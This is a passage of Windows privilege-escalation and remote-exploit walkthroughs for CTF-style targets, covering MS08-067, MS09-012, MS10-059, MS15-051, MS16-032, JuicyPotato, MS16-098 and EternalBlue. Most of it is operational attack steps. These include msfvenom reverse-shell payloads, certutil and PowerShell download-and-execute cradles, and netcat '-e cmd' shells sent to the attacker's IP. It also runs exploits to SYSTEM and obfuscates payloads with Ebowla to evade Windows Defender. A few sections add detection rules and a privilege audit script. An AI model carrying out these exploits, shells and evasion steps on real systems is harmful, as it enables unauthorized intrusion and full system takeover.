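shellcode += b"\xdb\xc6\x00\x74\x24\xf4\xbf\x91"
shellcode += b"\x33\x2f\xb1\x52\x31\x7a\x17\x83"
'''

# Matches the byte-string literal on each line; the group is the run of \xNN escapes.
BYTES_RE = re.compile(r'b"((?:\\x[0-9a-fA-F]{2})*)"')

def parse_msfvenom_py(text):
    """Reassemble the shellcode bytes from msfvenom's `-f py` output."""
    chunks = []
    for m in BYTES_RE.finditer(text):
        chunks.append(bytes.fromhex(m.group(1).replace("\\x", "")))
    return b"".join(chunks)

def find_bad_chars(shellcode, badchars=BADCHARS):
    """Return [(offset, byte_value), ...] for every bad character present."""
    return [(i, b) for i, b in enumerate(shellcode) if b in badchars]

def check_shellcode(text, badchars=BADCHARS):
    """Parse msfvenom output and report its length plus any bad-char hits."""
    sc = parse_msfvenom_py(text)
    return {"length": len(sc), "hits": find_bad_chars(sc, badchars)}

if __name__ == "__main__":
    for name, sample in (("clean", CLEAN_SAMPLE), ("dirty", DIRTY_SAMPLE)):
        r = check_shellcode(sample)
        hits = [(hex(o), hex(b)) for o, b in r["hits"]]
        print(f"{name}: {r['length']} bytes, bad chars at {hits or 'none'}")
```

Run it on the real msfvenom output with `check_shellcode(open("out.py").read())`; an empty `hits` list means the shellcode is safe to paste into the script.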
The script prints a usage message when run without arguments; you can exploit 7 different versions of Windows with the same script (the target IP comes first, then the target number and port):

```sh
Example: ms08_067_2018.py <target-ip> 1 445 -- for Windows XP SP0/SP1 Universal, port 445
Example: ms08_067_2018.py <target-ip> 2 139 -- for Windows 2000 Universal, port 139 (445 could also be used)
Example: ms08_067_2018.py <target-ip> 3 445 -- for Windows 2003 SP0 Universal
Example: ms08_067_2018.py <target-ip> 4 445 -- for Windows 2003 SP1 English
Example: ms08_067_2018.py <target-ip> 5 445 -- for Windows XP SP3 French (NX)
Example: ms08_067_2018.py <target-ip> 6 445 -- for Windows XP SP3 English (NX)
Example: ms08_067_2018.py <target-ip> 7 445 -- for Windows XP SP3 English (AlwaysOn NX)
```

Since I am targeting a `Windows XP SP3 English` box I'll use the 6th target.

Next start a netcat listener on the port you specified in your msfvenom payload (443) and leave it running.

Now all that's left is to run the script:

```sh
python ms08-067.py 10.10.10.4 6 445
```

It should send a reverse shell as SYSTEM to your netcat listener.

--------------------------------------------------------------------------------
/ms09-012.md:
--------------------------------------------------------------------------------

| CVE / MS | Title | Vulns |
| --------- | ----- | ----- |
| CVE-2009-0079 / MS09-012 | Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation. Churraskito.exe/churrasco.exe | win_2000 sp_4 arc_x86,win_vista sp_1 arc_x86,win_vista sp_1 arc_x64,win_xp sp_2 arc_x64,win_server_2008 arc_x64,win_xp sp_2 sp_3 arc_x86,win_server_2008 arc_x86,win_xp sp_2 arc_x86,win_server_2003 sp_2 arc_x64,win_xp sp_3 arc_x86,win_server_2003 sp_1 sp_2 arc_x86 |

By the time of writing this, the original author's research files were no longer accessible, and the three exploit binaries by the same author were:
* Churraskito.exe
* churrasco.exe
* Chimichuri.exe

I may be wrong to assume that Churraskito.exe and churrasco.exe are MS09-012 and Chimichuri.exe is MS10-059.
Even the GitHub repository the binaries were collected from has these binaries mixed under both bulletins.
But in testing, both Churraskito.exe and churrasco.exe worked on Windows Server 2003, and they should possibly work on Windows Server 2008 as well.

### Churraskito.exe

First download the exe from GitHub: [Churraskito_exe.zip](https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS10-059/Churraskito_exe.zip) (note the repository files it under MS10-059).

Extract it and upload the binary to your target system. Next run the binary with two arguments, the program to execute and its arguments:

```bash
Churraskito.exe "C:\windows\system32\cmd.exe" "whoami"

#Output
/Churraskito/-->This exploit gives you a Local System shell
/Churraskito/-->Build By Moskerde
/Churraskito/-->Got WMI process Pid: 1844
/Churraskito/-->Start Searching...
/Churraskito/-->Found token SYSTEM
/Churraskito/-->Running As system account!
/Churraskito/-->Command:C:\windows\system32\cmd.exe /c whoami

nt authority\system
```

If you have nc.exe uploaded on the target box, get a reverse shell like this (replace the IP and port with your listener's):

```sh
Churraskito.exe "C:\\Inetpub\\wwwroot\\nc.exe" "10.10.14.12 9002 -e cmd"

#Output
/Churraskito/-->This exploit gives you a Local System shell
/Churraskito/-->Build By Moskerde
/Churraskito/-->Got WMI process Pid: 1844
/Churraskito/-->Start Searching...
/Churraskito/-->Found token SYSTEM
/Churraskito/-->Running As system account!
/Churraskito/-->Command:C:\\Inetpub\\wwwroot\\nc.exe /c 10.10.14.12 9002 -e cmd

```

### churrasco.exe

First download the exe from GitHub: [churrasco.exe](https://raw.githubusercontent.com/Re4son/Churrasco/master/churrasco.exe)

Now upload the binary to your target system. Next run the binary with the command to execute as its argument:

```sh
C:\\Inetpub\\wwwroot\\churrasco.exe whoami

#Output
nt authority\system
```

If you have nc.exe uploaded on the target box, get a reverse shell like this (replace the IP with your listener's):

```sh
C:\\Inetpub\\wwwroot\\churrasco.exe "C:\\Inetpub\\wwwroot\\nc.exe <Your-Machine-IP> 9002 -e cmd"

```

--------------------------------------------------------------------------------
/ms10-059.md:
--------------------------------------------------------------------------------

| CVE / MS | Title | Vulns |
| --------- | ----- | ----- |
| CVE-2010-2554 / MS10-059 | Vulnerabilities in the Tracing Feature for Services Could Allow Elevation of Privilege. Chimichurri.exe | win_server_2008 sp_2 arc_x86,win_vista sp_1 sp_2 arc_x86,win_server_2008 arc_x86,win_10 arc_x86,win_server_2008 arc_x64,win_vista sp_1 sp_2 arc_x64,win_server_2008 sp_2 arc_x64,win_10 arc_x64 |

First download the file [Chimichurri.exe](https://github.com/egre55/windows-kernel-exploits/raw/master/MS10-059:%20Chimichurri/Compiled/Chimichurri.exe) to your local machine and start an SMB server with impacket-smbserver:

```sh
sudo impacket-smbserver myshare `pwd` -smb2
```

We can execute the file directly from the SMB share. The exploit program takes your IP and port as arguments and sends a reverse shell back. Start a netcat listener on port 9001 to catch the SYSTEM shell.

Now from the target's user shell execute:

```sh
\\<Your-Machine-IP>\myshare\Chimichurri.exe <Your-Machine-IP> 9001
```

Wait a few seconds and you have a SYSTEM shell on your netcat listener!

Alternatively, host the file from your local machine with Python's SimpleHTTPServer, upload it to the target with certutil.exe and then execute it:

```sh
certutil.exe -urlcache -f -split "http://<Your-Machine-IP>:8000/Chimichurri.exe" Chimichurri.exe
Chimichurri.exe <Your-Machine-IP> 9001

```

If you didn't know about certutil.exe, I highly recommend checking out [LOLBAS](https://lolbas-project.github.io/#) for Windows binaries that can be taken advantage of to do all kinds of things.

Download the [MS15-051-KB3045171.zip](https://github.com/SecWiki/windows-kernel-exploits/raw/master/MS15-051/MS15-051-KB3045171.zip) file and extract it. Depending on the target OS architecture use ms15-051.exe or ms15-051x64.exe. In my case I used ms15-051x64.exe on a Windows 2008 R2 x64 target.

Start an SMB server on your local machine using impacket-smbserver:

```sh
sudo impacket-smbserver myshare `pwd` -smb2
```

We can execute the file directly from the SMB share. The exe takes any command as its argument and executes it as SYSTEM, so we'll use it to send a reverse shell back to us. First copy a netcat binary (nc64.exe) into your smbserver directory so that it is reachable from the share as well. Next start a netcat listener on port 9001 to catch the SYSTEM shell, because a great Prince once said, [it's over 9000!](https://www.youtube.com/watch?v=SiMHTK15Pik)

Then execute the following in the target shell:

```sh
\\<Your-Machine-IP>\myshare\ms15-051x64.exe "\\<Your-Machine-IP>\myshare\nc64.exe <Your-Machine-IP> 9001 -e cmd"
```

Note: make sure the exe file names match the files in your local share directory.

Alternatively, upload the exe to the target system first and execute it there. Now you have a SYSTEM shell! Enjoy!

--------------------------------------------------------------------------------
/ms16-032.md:
--------------------------------------------------------------------------------

| CVE / MS | Title | Vulns |
| --------- | ----- | ----- |
| CVE-2016-0099 / MS16-032 | Secondary Logon Handle Privilege Escalation | win_server_2008 sp_2 arc_x64,win_server_2008 sp_1 arc_x64,win_10 arc_x64,win_vista sp_2 arc_x86,win_10 version_1511 arc_x86,win_server_2012 arc_x86,win_7 sp_1 arc_x64,win_10 version_1511 arc_x64,win_server_2008 sp_2 arc_x86,win_10 arc_x86,win_8.1 arc_x86,win_vista sp_2 arc_x64,win_8.1 arc_x64,win_7 sp_1 arc_x86,win_server_2008 sp_1 arc_x86 |

First get a PowerShell reverse shell on the target system.

Then download this file to your local system: [Invoke-MS16032.ps1](https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-MS16032.ps1). Edit the file and add the line below at the bottom of the script:

```sh
Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://:8000/Invoke-PowerShellTcp.ps1')"
```

Save it and download this file to your local system: [Invoke-PowerShellTcp.ps1](https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1). Edit the file and add the line below at the bottom of the script:

```sh
Invoke-PowerShellTcp -Reverse -IPAddress -Port 9000
```

Save it. Make sure both files are in the same directory and start a python SimpleHTTPServer on port 8000.
Open another terminal and start a netcat listener on port 9000; we will receive the System shell here later.
Then inside our PowerShell reverse shell execute the following:

```sh
IEX (New-Object Net.WebClient).DownloadString('http://:8000/Invoke-MS16032.ps1')
```

Wait a few seconds and a System shell will be sent to your netcat listener!

The exploit chain, oversimplified:

* the target requests your python server
* downloads Invoke-MS16032.ps1
* exploits the vulnerability and gets a SYSTEM process
* requests your python server again
* downloads Invoke-PowerShellTcp.ps1 from the SYSTEM process
* invokes the reverse TCP shell and connects to your netcat listener as SYSTEM.
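From the defender's side, every step of the chain above is a process-creation event whose command line fetches and runs remote content, which is what makes it detectable. The Python below is an added example, not code from the original write-up or from the Empire/nishang projects: it runs a handful of regex rules over constructed process-creation records (image name plus command line, the two fields a Sysmon Event ID 1 or Security 4688 event carries) and reports which rule each record trips. The rules encode the patterns this page shows: the PowerShell IEX/DownloadString cradle used here, the certutil -urlcache download and netcat -e cmd shell from the earlier sections, and the -t/-l/-p argument shape JuicyPotato takes later on the page. The event records, their field names and the IP addresses in them are all constructed for the example.

```python
"""Detect the download-and-execute cradles shown on this page.

Added example, not part of the original write-up. Runs regex rules over
constructed process-creation records and reports which rule each one trips.
"""
import re

# Each rule: (name, image regex, command-line regex). Both must match.
# Image regexes are anchored to the executable's base name so that, e.g.,
# "sync.exe" does not match the netcat rule.
RULES = [
    ("certutil-urlcache-download",
     r"(?i)(^|\\)certutil(\.exe)?$",
     r"(?i)-urlcache\b.*\s-(f|split)\b.*https?://"),
    ("powershell-iex-downloadstring",
     r"(?i)(^|\\)powershell(\.exe)?$",
     r"(?i)(iex|invoke-expression).*downloadstring\s*\("),
    ("powershell-downloadfile",
     r"(?i)(^|\\)powershell(\.exe)?$",
     r"(?i)downloadfile\s*\(.*https?://"),
    ("netcat-reverse-cmd",
     r"(?i)(^|\\)nc(64)?(\.exe)?$",
     r"(?i)\s-e\s+cmd(\.exe)?\b"),
    # JuicyPotato is usually copied under a new name, so key on its
    # argument shape (-t * -l <port> -p <program>) rather than the image.
    ("juicypotato-argument-shape",
     r".*",
     r"-t\s+\*\s+-l\s+\d+\s+-p\s+\S+"),
]

# Constructed sample records (field names and IPs are made up for the example).
SAMPLE_EVENTS = [
    {"id": 1, "image": "certutil.exe",
     "command_line": 'certutil.exe -urlcache -f -split "http://10.0.0.5:8000/Chimichurri.exe" Chimichurri.exe'},
    {"id": 2, "image": "powershell.exe",
     "command_line": "powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.0.0.5:8000/Invoke-PowerShellTcp.ps1')"},
    {"id": 3, "image": "powershell.exe",
     "command_line": "powershell (New-Object Net.WebClient).DownloadFile('http://10.0.0.5:8000/JuicyPotato.exe','C:\\Users\\Public\\JuicyPotato.exe')"},
    {"id": 4, "image": "nc64.exe",
     "command_line": "nc64.exe 10.0.0.5 9001 -e cmd"},
    {"id": 5, "image": "svc.exe",
     "command_line": "C:\\Users\\Public\\svc.exe -t * -l 1337 -p C:\\Users\\Public\\revx.exe"},
    # Benign records that must not trip anything.
    {"id": 6, "image": "certutil.exe",
     "command_line": "certutil.exe -hashfile C:\\setup.exe SHA256"},
    {"id": 7, "image": "powershell.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-Service"},
]


def match_rules(event):
    """Return the names of all rules this record trips, in RULES order."""
    hits = []
    for name, image_re, cmd_re in RULES:
        if re.search(image_re, event["image"]) and re.search(cmd_re, event["command_line"]):
            hits.append(name)
    return hits


def scan(events):
    """Return {event_id: [rule names]} for records that tripped at least one rule."""
    findings = {}
    for event in events:
        hits = match_rules(event)
        if hits:
            findings[event["id"]] = hits
    return findings


if __name__ == "__main__":
    for event_id, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(hits)}")
```

Both Sysmon Event ID 1 and Security Event 4688 carry the command line, but 4688 only does so when "Include command line in process creation events" is enabled through Group Policy; without it, rules like these have nothing to match on.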
--------------------------------------------------------------------------------
/ms16-075.md:
--------------------------------------------------------------------------------

| CVE / MS | Title | Vulns |
| --------- | ----- | ----- |
| MS16-075 | Rotten Potato – Privilege Escalation from Service Accounts to SYSTEM (JuicyPotato) | win_server_2008 sp_2 arc_x64,win_server_2008 sp_1 arc_x64,win_10 arc_x64,win_vista sp_2 arc_x86,win_10 version_1511 arc_x86,win_server_2012 arc_x86,win_7 sp_1 arc_x64,win_10 version_1511 arc_x64,win_server_2008 sp_2 arc_x86,win_10 arc_x86,win_8.1 arc_x86,win_vista sp_2 arc_x64,win_8.1 arc_x64,win_7 sp_1 arc_x86,win_server_2008 sp_1 arc_x86 |

I could not find a relevant CVE for this exploit yet. By the time I learned about this exploit, which was originally developed in 2016, there were already many variations of the Potato exploit in 2019, e.g. RottenPotatoNG, LonelyPotato, JuicyPotato.

I'll be demonstrating JuicyPotato, which I think is the most stable and has the highest success chance among all the other Potatoes.

The Affected Systems listed above were auto-generated through the MSBulletin link, but really the exploit seems to work on any machine where the user has the "SeImpersonatePrivilege" or "SeAssignPrimaryTokenPrivilege" privilege.

Check if they are available using the command: `whoami /priv`
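The same `whoami /priv` check is the defender's audit: any service account (an IIS application pool, SQL Server, a custom service) whose token holds either privilege is exposed to the whole Potato family, and the mitigation is to run that service under an account that does not hold them. The Python below is an added example, not part of the original write-up or of the JuicyPotato project. It parses the text output of `whoami /priv` and reports whether either privilege is present; the sample output is constructed to match the command's real column layout.

```python
"""Audit a token for the two privileges the Potato family relies on.

Added example for this page, not code from the original write-up. Parses the
text output of `whoami /priv` and reports whether SeImpersonatePrivilege or
SeAssignPrimaryTokenPrivilege is held by the token.
"""

# The two privileges this page names as the precondition for JuicyPotato.
POTATO_PRIVILEGES = ("SeImpersonatePrivilege", "SeAssignPrimaryTokenPrivilege")

# Constructed sample of `whoami /priv` output, shaped like the real command's.
SAMPLE_WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
"""


def parse_whoami_priv(text):
    """Return {privilege_name: state} parsed from `whoami /priv` output.

    Table rows start after the '====' separator line. Each row reads
    '<Name> <Description words...> <State>', so the first and the last
    whitespace-separated tokens are the privilege name and its state.
    """
    privileges = {}
    in_table = False
    for line in text.splitlines():
        if not in_table:
            in_table = line.startswith("=")
            continue
        parts = line.split()
        if len(parts) < 2:
            continue
        name, state = parts[0], parts[-1]
        if name.startswith("Se") and state in ("Enabled", "Disabled"):
            privileges[name] = state
    return privileges


def potato_exposure(text):
    """Map each Potato-relevant privilege to its state, or None if absent.

    A privilege that is present but 'Disabled' still counts: the process that
    holds the token can enable it again with AdjustTokenPrivileges. Only
    absence from the token removes the exposure.
    """
    privileges = parse_whoami_priv(text)
    return {name: privileges.get(name) for name in POTATO_PRIVILEGES}


def is_exposed(text):
    """True if the token holds either privilege, whatever its current state."""
    return any(state is not None for state in potato_exposure(text).values())


if __name__ == "__main__":
    for name, state in potato_exposure(SAMPLE_WHOAMI_PRIV).items():
        print(f"{name}: {state or 'absent'}")
    print("exposed" if is_exposed(SAMPLE_WHOAMI_PRIV) else "not exposed")
```

Run it against the saved output of `whoami /priv` taken in the context of each service account you want to audit; the Enabled/Disabled column is deliberately ignored for the verdict, since a disabled privilege in the token can be re-enabled by its holder.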

### Generating the program to be run by JuicyPotato

Choose either one of these:

### Simple bat script to execute Invoke-PowerShellTcp.ps1

Download the [Invoke-PowerShellTcp.ps1](https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1) file to your local system, edit it and add the line below at the bottom of the script:

```sh
Invoke-PowerShellTcp -Reverse -IPAddress -Port 443
```

Create a file named `rev.bat` with this as its content:

```sh
powershell.exe -c iex(new-object net.webclient).downloadstring(':8000/Invoke-PowerShellTcp.ps1')
```

### MSF reverse shell backdoor

I am demonstrating this POC against a Windows Server 2016 10.0.14393 x64-based OS, so if your target is x86-based then change the commands where necessary.

First we'll generate a reverse shell backdoor exe using msfvenom:

```sh
msfvenom -f exe -p windows/x64/shell_reverse_tcp LHOST= LPORT=443 -a x64 -o rev.exe
```

- - - - - - - - - - [OPTIONAL] - - - - - - - - - -

This binary will be immediately deleted on a Windows 10 or Server 2016 box if Windows Defender is active. So we can obfuscate the exe by encoding it with a tool named "Ebowla" (now deprecated but still works!) to bypass it. Requires Go, Python 2 and pip.

```sh
git clone https://github.com/Genetic-Malware/Ebowla.git
pip install configobj
```

The tool is ready to be used. Now edit the "genetic.config" file inside the Ebowla directory, find and change the following variables:

```sh
Encryption_Type = ENV
output_type = GO
payload_type = EXE
```

Find the [[ENV_VAR]] section. Set the value of the "computername" variable to the output of the "hostname" command on your target machine. Suppose mine is 'tally', so I am putting it like this:

```sh
username = ''
computername = 'tally'
homepath = ''
homedrive = ''
Number_of_processors = ''
processor_identifier = ''
processor_revision = ''
userdomain = ''
systemdrive = ''
userprofile = ''
path = ''
temp = ''
```

Leave the other variables mentioned above blank and the rest of the variables at their defaults, then save and exit.
Now copy the rev.exe file into the Ebowla directory and execute:

```sh
python ebowla.py rev.exe genetic.config

./build_x64_go.sh output/go_symmetric_rev.exe.go revx.exe
```

This produces an encoded version of the original exe program at output/revx.exe, which won't get deleted if Windows Defender is active on the box.

- - - - - - - - - - [/OPTIONAL] - - - - - - - - - -

Start a netcat listener on your local machine to receive the reverse shell as System later:

```sh
sudo nc -nlvp 443
```

Now download the JuicyPotato.exe matching your target:

* [x64 JuicyPotato](https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe)
* [x86 JuicyPotato](https://github.com/ivanitlearning/Juicy-Potato-x86/releases)

Put both JuicyPotato.exe and rev.bat/revx.exe in a directory and start a python SimpleHTTPServer. Change revx.exe to rev.bat in the commands below before executing them if you chose to go with the .bat program earlier:

```sh
powershell (New-Object Net.WebClient).DownloadFile('http://:8000/JuicyPotato.exe' , 'C:\Users\Public\JuicyPotato.exe')

powershell (New-Object Net.WebClient).DownloadFile('http://:8000/revx.exe' , 'C:\Users\Public\revx.exe')

C:\Users\Public\JuicyPotato.exe -t * -l 1337 -p C:\Users\Public\revx.exe
```

If everything went well you should receive a reverse shell connection on your netcat listener now. If the exploit failed and you see something like:

```sh
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
COM -> recv failed with error: XXXXX
```

then the default CLSID mentioned in the exploit is not working.

### Finding the right CLSID

* Execute `systeminfo` and get the OS Name; in my case it's 'Microsoft Windows 10 Enterprise'
* Go here: [http://ohpe.it/juicy-potato/CLSID/](http://ohpe.it/juicy-potato/CLSID/)
* Select the OS Name you got, and copy one of the CLSIDs which is owned by NT AUTHORITY\SYSTEM and whose local service looks like it should be available on the box by default.

In my case I selected this CLSID {e60687f7-01a1-40aa-86ac-db1cbf673334}, which is from the local service wuauserv (Windows Update Service) for Windows 10 Enterprise.

Now execute JuicyPotato.exe again with the CLSID included this time:

```sh
C:\Users\Public\JuicyPotato.exe -t * -l 1337 -p C:\Users\Public\revx.exe -c '{e60687f7-01a1-40aa-86ac-db1cbf673334}'
```

If everything went well you should receive a reverse shell connection on your netcat listener now. If the exploit failed again this time, change the CLSID to another one from that page and keep trying; one of the CLSIDs should work and you'll get the reverse shell.

--------------------------------------------------------------------------------
/ms16-098.md:
--------------------------------------------------------------------------------

| CVE / MS | Title | Vulns |
| --------- | ----- | ----- |
| CVE-2016-3309 / MS16-098 | RGNOBJ Integer Overflow on Windows 8.1 x64 bit by abusing GDI objects | win_7 version_1511 arc_x64,win_7 version_1511 arc_x86,win_server_2008 sp_2 arc_x86,win_10 sp_1 arc_x86,win_10 sp_1 arc_x64,win_server_2012 arc_x86,win_7 version_1607 arc_x64,win_vista sp_2 arc_x64,win_8.1 arc_x64,win_server_2008 sp_2 arc_x64,win_7 arc_x64,win_8.1 arc_x86,win_7 arc_x86,win_7 version_1607 arc_x86,win_vista sp_2 arc_x86,win_server_2008 sp_1 arc_x64,win_server_2008 sp_1 arc_x86 |

Important Note: This POC is only tested on Windows 8.1 x64 and Windows 2012 R2 x64. It may not work on others. Do NOT try this POC from a PowerShell reverse shell. If you happen to be on PowerShell like I was, then upload the [netcat](https://github.com/int0x33/nc.exe/raw/master/nc64.exe) binary and send a cmd shell to your local netcat listener:

```sh
.\nc64.exe 9000 -e cmd
```

Usually CTF boxes don't connect to Internet links, so in that case download the POC binary to your local machine from [here](https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe), then start a python SimpleHTTPServer on port 8000. On the target machine:

```sh
certutil.exe -urlcache -split -f "http://:8000/41020.exe" 41020.exe
.\41020.exe
```

If the program didn't hang, check `whoami`: you are already System! Alternatively you can start a samba server on your local machine using impacket-smbserver:

```sh
sudo impacket-smbserver myshare `pwd` -smb2
```

and run the exe directly from the network like this:

```sh
\\\myshare\41020.exe
```

--------------------------------------------------------------------------------
/ms17-010.md:
--------------------------------------------------------------------------------

| CVE / MS | Title | Vulns |
| --------- | ----- | ----- |
| CVE-2017-0144 / MS17-010 | Windows SMB Remote Code Execution (Eternalblue) | win_server_2008 sp_1 arc_x64,win_7 version_1511 arc_x64,win_server_2016 arc_x64,win_7 version_1607 arc_x86,win_server_2008 sp_2 arc_x64,win_server_2008 sp_2 arc_x86,win_7 arc_x64,win_vista sp_2 arc_x86,win_8.1 arc_x86,win_10 sp_1 arc_x64,win_server_2008 sp_1 arc_x86,win_10 sp_1 arc_x86,win_vista sp_2 arc_x64,win_7 version_1607 arc_x64,win_7 arc_x86,win_8.1 arc_x64,win_7 version_1511 arc_x86,win_server_2012 arc_x86 |

Git clone the following git repository:

```sh
git clone https://github.com/3ndG4me/AutoBlue-MS17-010.git
```

There are 4 scripts in that repository for different versions of Windows:

* zzz_exploit.py - this one will directly spawn a SYSTEM shell, no need to generate a payload. **[Use this first]**
* eternalblue_exploit7.py - Win 7 SP1 x64, Win 2008 R2 SP1 x64, Win 7 SP1 x86, Win 2008 SP1 x64, Win 2008 SP1 x86
* eternalblue_exploit8.py - Win 2012 R2 x64, Win 8.1 x64, Win 10 Pro Build 10240 x64
* eternalblue_exploit10.py - Win 2012 R2 x64, Win 8.1 x64, Win 10 Pro Build 10240 x64

### zzz_exploit.py

This should work on all targets. Just launch it with the target IP:

```sh
$ python zzz_exploit.py
# output
[*] Target OS: Windows 8.1 Enterprise 9600
[+] Found pipe 'netlogon'
[+] Using named pipe: netlogon
[*] Target is 64 bit
Got frag size: 0x20
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xf90
CONNECTION: 0xffffe00002935020
SESSION: 0xffffc000041ee050
FLINK: 0xffffc0000700e098
InParam: 0xffffc0000700816c
MID: 0x503
[+] success controlling groom transaction
[*] modify trans1 struct for arbitrary read/write
[*] make this SMB session to be SYSTEM
[*] overwriting session security context
[*] have fun with the system smb session!
[!] Dropping a semi-interactive shell (remember to escape special chars with ^)
[!] Executing interactive programs will hang shell!
C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>
```

This version reuses the same connection to execute commands. Remember the shell is not interactive.

### eternalblue_exploit[7/8/10].py

First, prepare the exploit payload:

```sh
cd shellcode && ./shell_prep.sh
```

The script will prepare the payload for both 32-bit and 64-bit Windows and ask for two listener ports to generate the payload.
Fill in the necessary information asked for by the script. It will generate the payload file as **sc_all.bin**.

Next start two netcat listeners on the port numbers chosen in the last step, in different terminals.

NOTE: you need a valid user account to exploit Windows 10 Build 10240 and Windows 2012 R2; they are more like a privesc than RCE. You need to add the username and password by editing those scripts.

My target was a Windows 7 x64, so I used eternalblue_exploit7.py:

```sh
python eternalblue_exploit7.py shellcode/sc_all.bin
```

The payload is compatible with both 32-bit and 64-bit Windows, so even if you initially don't know the correct edition it will send a reverse shell to one of the netcat listeners.

# For Windows XP, Server 2000:

First download these two Python2 scripts:

* [send_and_execute.py](https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py)
* [mysmb.py](https://raw.githubusercontent.com/helviojunior/MS17-010/master/mysmb.py)

These scripts require `impacket, pycrypto`. They are installed by default in Kali, but if you don't have them already then install them with:

```sh
pip install pycrypto
git clone https://github.com/CoreSecurity/impacket.git
cd impacket && pip install .
```

Next create a binary reverse shell payload using msfvenom:

```sh
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_shell.exe
```

Next start a netcat listener on the port you specified in your msfvenom payload and leave it running.

Now all that's left is to run the script:

```sh
python send_and_execute.py rev_shell.exe
```

In a couple of seconds a reverse shell should arrive as System on your netcat listener.

--------------------------------------------------------------------------------